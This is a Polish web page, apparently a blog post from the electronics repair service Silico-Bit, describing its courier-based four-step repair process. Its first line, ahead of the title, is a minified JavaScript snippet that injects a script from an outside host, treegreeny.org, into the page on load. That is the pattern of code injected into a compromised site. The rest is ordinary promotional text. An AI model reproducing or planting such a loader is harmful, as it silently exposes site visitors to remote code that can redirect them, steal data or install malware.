;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak wygląda naprawa sprzętu elektronicznego? | Silico-Bit
Dzisiejszy sprzęt elektroniczny nie posiada zbyt długiego okresu żywotności. Producenci przykładają ogromną wagę do designu, funkcji oraz wszelkich udogodnień, rezygnując z tym samym z dłuższego czasu przydatności. Dlatego tak często serwisy przyjmują urządzenia, które mają zaledwie kilka miesięcy. Jak wygląda naprawa sprzętu elektronicznego krok po kroku?

Naprawa sprzętu elektronicznego zazwyczaj jest bardziej opłacalna niż kupno nowego urządzenia

Serwis czy zakup nowego sprzętu?

Każdego roku pojawiają się na rynku coraz nowsze modele tych samych urządzeń – więcej udogodnień, a tym samym większa cena. To sprawia, że właściciele sprzętu elektronicznego zamiast naprawiać szwankujący sprzęt, decydują się na nowy model. Są zmęczeni ciągłymi naprawami, więc po około roku od zakupu swojego modelu, decydują się na ten, którego premiera właśnie się zbliża. Porównując ten koszt do kwoty serwisu, można stracić na takiej transakcji nawet kilka tysięcy złotych, w zależności od tego, jak szybko najnowszy model będzie tracił na wartości. Dlatego warto dowiedzieć się, jak naprawdę wygląda naprawa sprzętu elektronicznego, zanim zdecydujesz się wydać sporo pieniędzy na nowe urządzenie.

Co w sytuacji kiedy mieszkasz daleko od serwisu?

Jeśli zepsuje Ci się sprzęt, prostym rozwiązaniem będzie zaniesienie go do serwisu, który zajmie się jego naprawą. A co w sytuacji, gdy nie masz w pobliżu takiego wyspecjalizowanego serwisu sprzętu? To jeszcze prostsze.  Serwis Silico-Bit odbierze od Ciebie uszkodzone urządzenie, więc naprawa odbędzie się bez wychodzenia z domu! Naszym pośrednikiem będzie kurier, który dostarczy nam Twój sprzęt, a po skończonej naprawie, przywiezie go wprost pod Twoje drzwi.

Naprawa sprzętu elektronicznego przez serwis – krok po kroku

Każdy serwis sprzętu składa się z kilku etapów, które są niezbędne, aby naprawa była satysfakcjonująca zarówno dla klienta, jak i dla punktu serwisowego. Uczciwy i profesjonalny serwis wybierze taki rodzaj naprawy, który będzie korzystny dla klienta – w przypadku nieopłacalności naprawy, serwis poinformuje o tym właściciela sprzętu, aby nie narażać go na niepotrzebne koszty.

Naprawa sprzętu elektronicznego może potrwać maksymalnie kilka dni

Naprawa sprzętu elektronicznego – 4 proste kroki

Naprawa sprzętu elektronicznego w Silico-Bit to cztery proste kroki, które odciążają klienta od niepotrzebnych obowiązków. Na początku następuje kontakt z serwisem – telefoniczny, bądź poprzez stronę serwisową – w której klient powinien zgłosić chęć naprawy urządzenia. Wypełnienie formularza usprawni cały proces, ponieważ serwis zyska niezbędne informacje, na temat naprawianego sprzętu. Następnie kurier odbiera od klienta uszkodzony sprzęt i przekazuje go do serwisu. Tam następuje wstępna diagnoza i oszacowanie kosztów, związanych z usługą oraz ewentualnymi kosztami nowych podzespołów. Klient wówczas zostaje poinformowany o wszelkich krokach i podejmuje decyzję, czy chce naprawiać sprzęt, czy rezygnuje z usługi. Następnym krokiem jest naprawa urządzenia przez specjalistę, który również przetestuje działanie naprawionego sprzętu. Jeśli efekt końcowy jest zadowalający, kurier dostarcza sprawne urządzenie do klienta. Cały proces trwa kilka dni, po których użytkownik może znów cieszyć się odnowionym sprzętem elektronicznym.